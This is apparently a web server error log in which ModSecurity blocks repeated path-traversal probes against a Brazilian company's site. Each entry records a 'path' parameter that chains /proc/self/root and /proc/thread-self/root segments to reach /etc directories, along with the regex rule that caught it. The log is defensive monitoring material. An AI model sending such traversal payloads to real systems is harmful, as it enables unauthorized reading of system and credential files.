[Mon Mar 16 18:12:13.219189 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:56854] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyLc_BxrYCr4hPDw8GkgAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:14.605066 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.241.46:56866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyLrABkC4fWIHEf8EUAwAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:15.804385 2026] [:error] [pid 21805:tid 140411733534464] [client 74.7.241.46:56882] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyL7ABkC4fWIHEf8EUBgAAAEE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:19.420030 2026] [:error] [pid 29802:tid 140411708356352] [client 74.7.241.46:56886] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyM8_BxrYCr4hPDw8GlQAAAcQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:20.806314 2026] [:error] [pid 15061:tid 140411548894976] [client 74.7.241.46:51418] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyNKTCbgAP5jq5TehH9AAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:22.039810 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.241.46:51430] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyNqTCbgAP5jq5TehH9QAAAtI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:22.800158 2026] [:error] [pid 10772:tid 140411674785536] [client 74.7.243.203:45552] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyNv9ocpUE4ed4uDwQBQAAAgg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:23.348866 2026] [:error] [pid 10651:tid 140411725141760] [client 74.7.241.46:51438] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyN7ysWC90G-1nBrBhKAAAAYI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:25.130950 2026] [:error] [pid 29507:tid 140411607643904] [client 74.7.243.203:40846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyOUr9dMAiw-8KANNlQAAAARA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:26.427485 2026] [:error] [pid 29507:tid 140411590858496] [client 74.7.243.203:40862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyOkr9dMAiw-8KANNlQQAAARI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:26.839249 2026] [:error] [pid 14895:tid 140411666392832] [client 74.7.241.46:51450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyOlajLEzk2WiQ-10usgAAAok"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:28.135204 2026] [:error] [pid 21806:tid 140411616036608] [client 74.7.241.46:40422] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyPNSswJuvopo3lOh9FAAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:31.575256 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:40428] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyP_9ocpUE4ed4uDwQDAAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:32.911489 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.241.46:40442] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyQLABkC4fWIHEf8EUEQAAAEM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:36.272059 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.241.46:40450] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyRP9ocpUE4ed4uDwQEwAAAhA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:45.515252 2026] [:error] [pid 29507:tid 140411582465792] [client 74.7.241.46:40464] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyTUr9dMAiw-8KANNlUQAAARM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:46.801446 2026] [:error] [pid 21805:tid 140411624429312] [client 74.7.241.46:60700] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyTrABkC4fWIHEf8EUEgAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:47.987460 2026] [:error] [pid 29507:tid 140411699963648] [client 74.7.241.46:57874] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyT0r9dMAiw-8KANNlUgAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:12:50.448573 2026] [:error] [pid 14895:tid 140411699963648] [client 74.7.241.46:57888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyUlajLEzk2WiQ-10utgAAAoU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:02.539194 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.241.46:57900] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyXv9ocpUE4ed4uDwQOwAAAgo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:04.890997 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.241.46:47856] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyYKTCbgAP5jq5TehH_QAAAss"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:13:06.132605 2026] [:error] [pid 21805:tid 140411616036608] [client 74.7.241.46:47866] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhyYrABkC4fWIHEf8EUGAAAAE8"], referer: 